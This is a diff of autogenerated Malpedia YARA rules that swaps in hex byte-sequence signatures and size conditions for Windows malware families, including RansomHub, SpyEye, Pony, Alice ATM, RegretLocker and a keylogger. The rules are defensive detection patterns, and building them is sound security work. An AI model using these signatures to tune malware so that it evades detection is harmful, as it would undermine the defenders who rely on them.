 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "801276e5-64e7-59d1-a653-8ee4b7f16dc4"
+		id = "d0d529bd-8ddc-568c-bb57-34ccb7211d4b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lolsnif_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.odinaff_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "4100f8ab27f3910e5c0d280cf414b7c267c81147c4a7bc07b3262d87c3731e63"
+		logic_hash = "a33fd98331eb6936af0c82dded866dcdbe45b48b5675a4678e1caee59c4bd151"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140553,32 +140313,32 @@ rule MALPEDIA_Win_Lolsnif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7313 57 57 57 57 53 ff75fc }
-		$sequence_1 = { 5b c20c00 55 8bec 83ec14 817d0c00100000 }
-		$sequence_2 = { b892e8ffff c3 55 8bec 83ec40 53 56 }
-		$sequence_3 = { e8???????? 8bf0 3bf3 7439 3bfb 7411 8b4718 }
-		$sequence_4 = { 33db 53 c744241001000000 bf???????? ffd6 ff7508 57 }
-		$sequence_5 = { f00fc108 a1???????? 83c040 50 ffd3 a1???????? 56 }
-		$sequence_6 = { eb06 41 894804 33ff 5b 8bc7 5f }
-		$sequence_7 = { 3bc6 8945f4 754d 8b4dc0 56 ff35???????? 8bc1 }
-		$sequence_8 = { ab ab 8d442428 50 8d44241c 50 }
-		$sequence_9 = { ff7704 e8???????? 3de8000000 7509 834dfcff e9???????? }
+		$sequence_0 = { 56 c745983c000000 c745ac00010000 8955c4 c745c800080000 }
+		$sequence_1 = { f7de 85c0 7408 50 }
+		$sequence_2 = { 83c410 f7d8 1bf6 8b45e8 f7de 85c0 }
+		$sequence_3 = { 6a00 51 52 50 ff15???????? 8945e8 }
+		$sequence_4 = { c745fc00010000 ff15???????? 50 ff15???????? 8bf8 8d45fc 50 }
+		$sequence_5 = { b8???????? e8???????? 8b1d???????? 83c410 f7d8 1bf6 8b45e8 }
+		$sequence_6 = { 53 56 57 8b3d???????? 6800001000 }
+		$sequence_7 = { 68???????? 68???????? 53 8bf0 ff15???????? 83c40c }
+		$sequence_8 = { 6a00 6a00 51 ff15???????? 8b45fc 85c0 }
+		$sequence_9 = { ffd3 8b3d???????? 50 ffd7 6808020000 }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Graphite_Auto : FILE
+rule MALPEDIA_Win_Ransomhub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc"
+		id = "3e3a1e40-e1d1-52bd-84f7-e9d4fbcb059d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphite_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomhub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomhub_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f"
+		logic_hash = "04cb851589645119dff5d45b0c40a2835781fcc030d792f49fd4c3e1be1bf3b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140592,34 +140352,34 @@ rule MALPEDIA_Win_Graphite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85db 7513 33d2 e8???????? 84c0 }
-		$sequence_1 = { 7513 33d2 e8???????? 84c0 }
-		$sequence_2 = { 81e2ff030000 81e1bf030000 83c940 c1e10a }
-		$sequence_3 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca }
-		$sequence_4 = { 85db 7513 33d2 e8???????? }
-		$sequence_5 = { 81e1bf030000 83c940 c1e10a 0bca }
-		$sequence_6 = { 85db 7513 33d2 e8???????? 84c0 74e4 }
-		$sequence_7 = { 7513 33d2 e8???????? 84c0 74e4 }
-		$sequence_8 = { 33d2 e8???????? 84c0 74e4 }
-		$sequence_9 = { ff15???????? 33c0 eb05 b801010000 }
+		$sequence_0 = { eb0f 488d3dbb5d5100 0f1f00 e8???????? e8???????? 48891d???????? 833d????????00 }
+		$sequence_1 = { e8???????? 488d3d03f63300 0f1f00 e8???????? e8???????? 4889842430190000 48899c24b00a0000 }
+		$sequence_2 = { bb07000000 488bac2488000000 4881c490000000 c3 488d058db90b00 bb07000000 488bac2488000000 }
+		$sequence_3 = { bf01000000 488b8424f00b0000 e8???????? 4c8b8c24f00b0000 41ff8980000000 488b8c2488030000 488b8424b8030000 }
+		$sequence_4 = { b90f000000 e8???????? 48898424000e0000 48899c24b8000000 488b15???????? 48899424c0110000 488d0580fd2800 }
+		$sequence_5 = { 48c744243400000000 0fb6542449 0fb6742443 01f2 0fb6742442 0fb67c244c 440fb6442457 }
+		$sequence_6 = { eb09 4889c7 90 e8???????? 488d05d40d2f00 488b5c2438 488d0db3af3300 }
+		$sequence_7 = { 4d8d0cb0 4d8d49fc 450fb609 488d4701 4839c1 0f86ff000000 4829f2 }
+		$sequence_8 = { c3 80fb2d 0f85be010000 8400 833d????????00 750c 488d0dbdfa2800 }
+		$sequence_9 = { e8???????? 4889442428 48c70000000000 488d05b41b0700 e8???????? 4889442420 488d05a3ea0900 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 12821504
 }
-rule MALPEDIA_Win_R980_Auto : FILE
+rule MALPEDIA_Win_Spyeye_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93137b54-f6ba-5cf4-a0be-8189c2bb31ee"
+		id = "b5e5088a-e300-5034-889b-970db77fc21d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.r980_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyeye_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fbf84b1263b8ff37213624bd208f7542a2b35e24d52f97dbbecc6762e2858308"
+		logic_hash = "eb40febb6f1c9817c33c9124c37ea30f926a02c0c70087f7a1361d98282ccb0d"
 		score = 75
-		quality = 45
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -140631,32 +140391,32 @@ rule MALPEDIA_Win_R980_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c e9???????? a900040000 0f84b0000000 837f1408 7204 8b07 }
-		$sequence_1 = { 8bc8 e8???????? 8d45d8 50 8d8d38ffffff e8???????? ff7524 }
-		$sequence_2 = { e8???????? 8b75e0 83c414 83fe03 7707 ff24b5c8ba4000 e8???????? }
-		$sequence_3 = { ff5004 c745fc07000000 8b7510 85f6 741e 8bc3 f00fc14604 }
-		$sequence_4 = { 68???????? e8???????? 51 6a20 50 8d8df0f9ffff c645fc04 }
-		$sequence_5 = { 33c1 8944960c 8b44241c 8b8810010000 8b8014010000 8d0c88 8d4204 }
-		$sequence_6 = { c60100 e8???????? e8???????? 8d942490000000 b9???????? e8???????? 8d842490000000 }
-		$sequence_7 = { 722c 8b4640 8945a4 8d0c38 894e40 8b4630 8945ac }
-		$sequence_8 = { 8bcf e8???????? 8a00 8806 834710ff 7509 c7470c00000000 }
-		$sequence_9 = { 68???????? 8d45b4 c745ac0f000000 50 c745a800000000 c6459800 e8???????? }
+		$sequence_0 = { 740e 837dfcff 7408 ff75fc }
+		$sequence_1 = { 8b65fc c9 c20800 55 8bec }
+		$sequence_2 = { 56 6880000000 6a04 56 6a07 6800000040 57 }
+		$sequence_3 = { ff7508 ffd0 8b65fc c9 c21400 55 8bec }
+		$sequence_4 = { ff750c e8???????? 8bd8 83fbff 751b 57 }
+		$sequence_5 = { 837dfcff 7408 ff75fc e8???????? 3bdf }
+		$sequence_6 = { 740a 83e0fe 50 57 }
+		$sequence_7 = { 6a02 eb08 56 6880000000 6a04 }
+		$sequence_8 = { 6a03 57 6a01 56 ff750c e8???????? }
+		$sequence_9 = { 50 e8???????? 85c0 7454 57 56 }
 
 	condition:
-		7 of them and filesize < 3178496
+		7 of them and filesize < 741376
 }
-rule MALPEDIA_Win_Manjusaka_Auto : FILE
+rule MALPEDIA_Win_Badaudio_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "51e0b6e1-e568-5f67-9420-ee9d6d4c7f64"
+		id = "05c804a9-cf16-57d2-a80f-b619976bbd0d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.manjusaka_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badaudio"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badaudio_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "29c4c663bca03e2a4622112f8201d75001eddf5ba4fdd44c2a396a51b4263dae"
+		logic_hash = "a6c973b5c41c14ecfe9459d805cffcba8f5aa17e724a8b86913ac3f147c5345e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140670,32 +140430,32 @@ rule MALPEDIA_Win_Manjusaka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4110 4885c0 0f8482000000 488b31 486bf870 31db 48837c1e0800 }
-		$sequence_1 = { 8be9 2bef 4803fa 399c2490000000 7417 498b4d70 e8???????? }
-		$sequence_2 = { f048ff08 750d 488d8c2438010000 e8???????? 80bc24c801000002 740d 488d8c2440010000 }
-		$sequence_3 = { 85c0 750e b9667b0200 e8???????? 8bc8 ebe2 488b4b18 }
-		$sequence_4 = { ba08000000 e8???????? 0f0b 488d4134 c3 488d4135 c3 }
-		$sequence_5 = { 81fa00fc0000 7323 66c741100100 6644894112 48c1e010 4883c801 c3 }
-		$sequence_6 = { e8???????? 4885d2 7415 4c39e8 7509 4c39e2 0f846a010000 }
-		$sequence_7 = { 8a8c0ca2000000 41300c2f 488d4d01 4889cd 4939cc 75b8 488b442440 }
-		$sequence_8 = { f048ff00 0f8e64050000 4889c7 b930000000 ba08000000 e8???????? 4885c0 }
-		$sequence_9 = { 8806 4883c440 5e c3 4889d1 4c89c2 4d89c8 }
+		$sequence_0 = { 886e09 88560d 886602 884e0a }
+		$sequence_1 = { c6470c00 807de000 0f8447ffffff 8b45dc c745dc00000000 8b4dd4 }
+		$sequence_2 = { 885c8103 40 83f83c 7463 8a7c81fc 0fb65481fd 0fb6f7 }
+		$sequence_3 = { f20f114030 f20f10442438 f20f114038 f20f108424e0000000 f20f114058 f20f108424d8000000 f20f114050 }
+		$sequence_4 = { 0f57d8 0f115c2411 0f10442461 0f104c2421 0f109424a1000000 }
+		$sequence_5 = { 8a4627 88431c 8a4626 88431d 8a4625 88431e 8a4624 }
+		$sequence_6 = { 8b540c48 89542438 83c104 894c2408 8b0c24 894c2430 }
+		$sequence_7 = { c7462800000000 c7462c0f000000 c6461800 f20f104010 f20f114310 }
+		$sequence_8 = { 8a442404 3287e4000000 884604 329fe5000000 885e05 3297e6000000 885606 }
+		$sequence_9 = { 0355e0 39d1 89d6 0f43f1 }
 
 	condition:
-		7 of them and filesize < 4772864
+		7 of them and filesize < 1420288
 }
-rule MALPEDIA_Win_Moriagent_Auto : FILE
+rule MALPEDIA_Win_Go_Red_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0e8552c-2a56-5880-9b39-e228e0ca2c36"
+		id = "349c73e1-95b2-5589-863e-7a8d953d6a5e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moriagent_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.go_red"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.go_red_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f619de3127e38febd0ef7c0dec89df2ad37cda3381275176b5456add134d4a40"
+		logic_hash = "f8574b8fe29715ba2701e58cba52ed611bfc6971c882e6ec12a4906afec7293e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140709,32 +140469,32 @@ rule MALPEDIA_Win_Moriagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 8b55c4 8b45f0 40 }
-		$sequence_1 = { 47 8b048500844200 885c012e 3bfa 7cea 8b7ddc }
-		$sequence_2 = { c785e4efffff00000000 c785e8efffff00000000 c785ecefffff00000000 83fa10 722f }
-		$sequence_3 = { 3bc1 7767 85ff 7425 41 8d0442 56 }
-		$sequence_4 = { eb4c 8b4714 8bd9 2bda 2bc2 3bd8 7727 }
-		$sequence_5 = { 8bc1 c785e4fdfffffc010000 0f43d6 c785f0fdffff07000000 c785f4fdffff01800000 2bd0 0f1f4000 }
-		$sequence_6 = { 8d8dccefffff e8???????? 8d8dd4efffff e8???????? }
-		$sequence_7 = { 8b5d08 8b048500844200 56 57 8bfb 8b440818 }
-		$sequence_8 = { 83c408 85c0 742a f68568feffff10 7521 8b4704 8d4da8 }
-		$sequence_9 = { 7467 8b45e4 3bc8 7713 837de010 8bc7 894f10 }
+		$sequence_0 = { e8???????? 84c0 740a 488b7c2470 e9???????? 488b7c2470 488b5748 }
+		$sequence_1 = { eb0a 488b7c2450 e8???????? 488b542470 4c8b442468 4c8b4c2438 488b5228 }
+		$sequence_2 = { e8???????? 488b6d00 488d0526777d00 4889cb 0f1f00 e8???????? 4889442470 }
+		$sequence_3 = { e8???????? 48c7400802000000 48c7401002000000 833d????????00 750d 488b8c24c02f0000 488908 }
+		$sequence_4 = { eb11 4889c7 488b8c24001c0000 90 e8???????? 488d0554889f00 e8???????? }
+		$sequence_5 = { e8???????? 488b942498000000 488bb424b0000000 4989c1 b901000000 41b801000000 488b442458 }
+		$sequence_6 = { e8???????? 4c89d8 e8???????? 4889f8 4c89d9 e8???????? 4c89c0 }
+		$sequence_7 = { eb1c 488d7802 4839f9 7c18 4839c1 0f86a8020000 0fb63c02 }
+		$sequence_8 = { e8???????? 488d05da7f9e00 e8???????? 4889842458060000 48b9211f0000b9030000 488908 488b9c24481a0000 }
+		$sequence_9 = { e8???????? 488d0521e7a701 bb14000000 e8???????? 90 4889442408 895c2410 }
 
 	condition:
-		7 of them and filesize < 720896
+		7 of them and filesize < 85566464
 }
-rule MALPEDIA_Win_Donex_Auto : FILE
+rule MALPEDIA_Win_Alice_Atm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a59c3405-5607-5fba-8e4b-94db509c7ebd"
+		id = "9cfa3195-b227-51b9-a69c-03c48bd5ea46"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.donex_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alice_atm_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "34b4db6a7ff26120108a4a0b63d1aeaf3b7a5f8d055f37299085290aeaa32538"
+		logic_hash = "0ef9f8a95dbcda5f31fa4765cc9c970db5415f8125e940fffc88bdbab240fbed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140748,32 +140508,32 @@ rule MALPEDIA_Win_Donex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b55c8 33f6 8bf8 0facd012 c1e70e 0bf0 c1ea12 }
-		$sequence_1 = { 55 8bec 8b4508 53 bb01000000 85c0 7503 }
-		$sequence_2 = { 894d18 c744b30400000000 3bce 72ae 8b4508 c1e602 56 }
-		$sequence_3 = { 33c8 8b45f4 c1e808 0fb6c0 c1e108 0fb680488d4300 33c8 }
-		$sequence_4 = { 03c2 894db0 8bd0 8945f4 c1cf02 8bcf c1c205 }
-		$sequence_5 = { 8b5508 8b7a0c 8b7210 8b4a08 8b5214 }
-		$sequence_6 = { 85ff 0f85d4030000 8b7de8 8d45c8 50 57 }
-		$sequence_7 = { 33c9 83c408 668908 8b45ec 83f803 7405 83f804 }
-		$sequence_8 = { c1e902 f3a5 8bca 83e103 f3a4 8b7df8 4f }
-		$sequence_9 = { 740f 83fe09 740a 83fe0d 7405 83fe0a 751a }
+		$sequence_0 = { 682e010000 ff7110 e8???????? 8bd8 }
+		$sequence_1 = { 0bc0 0f841b010000 b910000000 33d2 f7f1 0fb7f8 }
+		$sequence_2 = { 0f85b7000000 e8???????? ff7508 8f05???????? 68ea030000 }
+		$sequence_3 = { 53 e8???????? e9???????? 817d0c11010000 0f858b000000 8b4d10 6681f9d507 }
+		$sequence_4 = { 7434 8d75d4 6a28 56 }
+		$sequence_5 = { 68ec030000 ff7508 e8???????? 8bf0 }
+		$sequence_6 = { 55 8bec 81c4f4fdffff 53 56 57 33ff }
+		$sequence_7 = { 33c0 8945fc 8b5d08 0bdb 7414 6a00 6a00 }
+		$sequence_8 = { 6a00 68e8030000 ff35???????? e8???????? }
+		$sequence_9 = { f7f1 0fb7c0 8945f8 8b7d10 83ff00 0f86c2000000 3b7df8 }
 
 	condition:
-		7 of them and filesize < 505856
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Edr_Silencer_Auto : FILE
+rule MALPEDIA_Win_Green_Dispenser_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91d15ce1-a998-5572-89fb-85a860af50f1"
+		id = "954f1c32-9e66-5f40-9a6c-8af93a40211b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.edr_silencer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.edr_silencer_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.green_dispenser"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.green_dispenser_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "36fd2a9fad325810fcce7416a9019a99b9100292037753c9fbfd0fd06391d993"
+		logic_hash = "4d0e3b4ff260054d419dc5677f1ac18d6112aade6736ec0a9f2b7f8946b1fdb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140787,32 +140547,32 @@ rule MALPEDIA_Win_Edr_Silencer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 898524030000 83bd2403000000 0f84b1000000 83bd2403000005 }
-		$sequence_1 = { e8???????? 85c0 0f84b7000000 4183ee57 4189fd 6690 }
-		$sequence_2 = { 488d154a7b0000 89442420 488d4c243e 480f44da 4c89e2 }
-		$sequence_3 = { 4889c1 488b05???????? ffd0 b801000000 4883c450 }
-		$sequence_4 = { 488b85d8010000 488b00 488b4008 4885c0 }
-		$sequence_5 = { e8???????? b801000000 e9???????? e8???????? 85c0 750a b801000000 }
-		$sequence_6 = { 4889c1 e8???????? 8945f8 837df800 7416 8b45f8 }
-		$sequence_7 = { b900000000 e8???????? 8945f8 837df800 7416 8b45f8 }
-		$sequence_8 = { 48894558 488b8518030000 488d4db0 488d5510 4989c9 }
-		$sequence_9 = { 488b05???????? ffd0 89c2 488d0d5fc70000 }
+		$sequence_0 = { 83c404 897508 895dfc 85f6 7453 8b450c 895e08 }
+		$sequence_1 = { 8d3c9e 03c2 03fa 49 }
+		$sequence_2 = { ffb554fbffff e8???????? 83c404 ff75d0 ff15???????? 8bbd9cfbffff 8b8da0fbffff }
+		$sequence_3 = { 8b7d08 85ff 747e 391f 757a 6a18 e8???????? }
+		$sequence_4 = { c1f803 b9???????? 8d3c9530df4200 8b11 2b17 3bd0 }
+		$sequence_5 = { 50 8b8530e5ffff c645f40d 8b048550aa4500 ff3406 }
+		$sequence_6 = { 0f841d010000 397e04 0f8e14010000 8b4e08 894dec 51 8bd7 }
+		$sequence_7 = { 6a00 68???????? ff75e8 0f57c0 660fd645f1 c745ec09000000 ff15???????? }
+		$sequence_8 = { 8bec 53 56 8b750c 57 8bfa 83fe03 }
+		$sequence_9 = { 7436 ba02000000 e8???????? 8945fc 85c0 74bf 8bd0 }
 
 	condition:
-		7 of them and filesize < 744448
+		7 of them and filesize < 838656
 }
-rule MALPEDIA_Win_Slub_Auto : FILE
+rule MALPEDIA_Win_Regretlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c0a27b8-13ae-509d-aab0-4967f12001e1"
+		id = "50b9971a-330e-56d2-b756-71f28fc91f9f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slub_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.regretlocker_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "264575ee79f35f47d39754d10976636a28b6cb6786a3fc3ffd41fec9d7f59aa5"
+		logic_hash = "ead6b2d4c6df817cb3c1a72366d53d238049299ae52f7c46e3aa685242a44978"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140826,32 +140586,32 @@ rule MALPEDIA_Win_Slub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8520fbffff 50 68???????? 8d8d08fbffff e8???????? 8bc8 e8???????? }
-		$sequence_1 = { 0f848d000000 833801 56 8b74240c 0f8581000000 80bf3803000000 53 }
-		$sequence_2 = { 55 33f6 c644242400 53 89742420 e8???????? }
-		$sequence_3 = { 837f2c00 8b6c2428 89473c 897740 7527 3b6b10 0f84d90f0000 }
-		$sequence_4 = { 85db 741a 33f6 85ed 7e14 56 }
-		$sequence_5 = { c645fc16 8d8d80fdffff 8b85d4fdffff 83c018 50 e8???????? c645fc17 }
-		$sequence_6 = { 0f842c060000 85c0 8b44241c 0f95c1 888815040000 8b4008 85c0 }
-		$sequence_7 = { 83c418 85ff 7425 57 e8???????? 50 57 }
-		$sequence_8 = { 8bf8 83c408 85ff 75cf 38442411 0f84700a0000 6a01 }
-		$sequence_9 = { 8d8358020000 50 8d8664040000 50 e8???????? 83c408 84c0 }
+		$sequence_0 = { e8???????? 8d4d8f e8???????? 8bf8 6a20 58 ff35???????? }
+		$sequence_1 = { 7202 8b09 6a00 51 e8???????? 83f8ff }
+		$sequence_2 = { 8d8560feffff 8bce 50 e8???????? 84c0 746b }
+		$sequence_3 = { e9???????? 8b4df0 83c12c e9???????? 8d4dd8 e9???????? b8???????? }
+		$sequence_4 = { eb4c 8b08 80790d00 7439 8b4804 80790d00 }
+		$sequence_5 = { 8b01 8945ec 3bc1 0f84c5000000 8855e8 33ff 8855e4 }
+		$sequence_6 = { a5 a5 8d7dec ab ab }
+		$sequence_7 = { 56 57 8b7d08 8bf1 3bf7 742b 8d4718 }
+		$sequence_8 = { 8bc1 2b45cc 99 f7fb c645fc02 8bf0 8b45c4 }
+		$sequence_9 = { 5b 85c0 0f8569ffffff 8b4df4 8bc6 5f 5e }
 
 	condition:
-		7 of them and filesize < 1785856
+		7 of them and filesize < 1021952
 }
-rule MALPEDIA_Win_Electricfish_Auto : FILE
+rule MALPEDIA_Win_Pony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bbe8d4f-bb22-5f20-a9d1-098a3e3e3fc4"
+		id = "1e9f1216-c41a-57fb-9136-54f943e63660"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.electricfish_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pony_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "107f1b585d0a1fb5b5a2004135458a9d2fc68da8f22b2f0a6dfa6f03b7f81b2b"
+		logic_hash = "9de93368584eaaab5c5e69d58fb6c6411ee417490cc0e48dc0aded17e02bd8ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140865,32 +140625,32 @@ rule MALPEDIA_Win_Electricfish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb08 56 57 53 ffd0 83c40c 3bc6 }
-		$sequence_1 = { e8???????? 8bf8 85ff 75e0 6891010000 68???????? 6a41 }
-		$sequence_2 = { eb3a 0fb67201 81e680000000 b901000000 3bc6 75c4 68ae000000 }
-		$sequence_3 = { 39442458 7413 6852020000 68???????? 50 e8???????? 83c40c }
-		$sequence_4 = { c3 837f1006 7414 689a010000 68???????? 6892000000 e9???????? }
-		$sequence_5 = { 33c0 c745fc02000000 8945e8 8945ec 8d45e8 6a08 50 }
-		$sequence_6 = { f6423401 7508 c744241401000000 8b834c010000 85c0 0f8426010000 3bf8 }
-		$sequence_7 = { 85ed 7518 6874010000 68???????? 6a41 6a7d 6a0b }
-		$sequence_8 = { e8???????? 83c40c 85c0 0f84bb040000 6a01 53 c7430c00000000 }
-		$sequence_9 = { 85ff 0f8522010000 e8???????? 5f 5e 5d }
+		$sequence_0 = { c6400200 c6400300 c6400400 c6400505 8d45f4 50 }
+		$sequence_1 = { 33f9 8d9c1f051d8804 035e18 c1c317 }
+		$sequence_2 = { 7406 50 e8???????? c785dcf7ffff15000000 8d85d0f7ffff }
+		$sequence_3 = { ff750c ff35???????? e8???????? 8945f4 6a00 ff7514 ff750c }
+		$sequence_4 = { c1e002 31c2 89c8 c1e810 31d0 89c3 }
+		$sequence_5 = { 75ed 0fb646ff 83f808 7702 2bf0 2b7510 d1ee }
+		$sequence_6 = { 2bfb 83fb38 720e 03fb b840000000 2bc3 03f8 }
+		$sequence_7 = { 6800fa0000 ff75f4 ff7508 e8???????? 85c0 0f8430010000 ff75f4 }
+		$sequence_8 = { 68???????? e8???????? 898554ffffff 83bd54ffffff00 7445 83bd58ffffff14 723c }
+		$sequence_9 = { ff7518 e8???????? ff750c e8???????? d1e0 83c002 }
 
 	condition:
-		7 of them and filesize < 3162112
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Sunorcal_Auto : FILE
+rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6c432810-e8f0-5844-8d29-cb8f4d1dde8c"
+		id = "f772ff80-f7e1-59f5-b4f9-deba38267db2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sunorcal_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netrepser_keylogger_auto.yar#L1-L174"
 		license_url = "N/A"
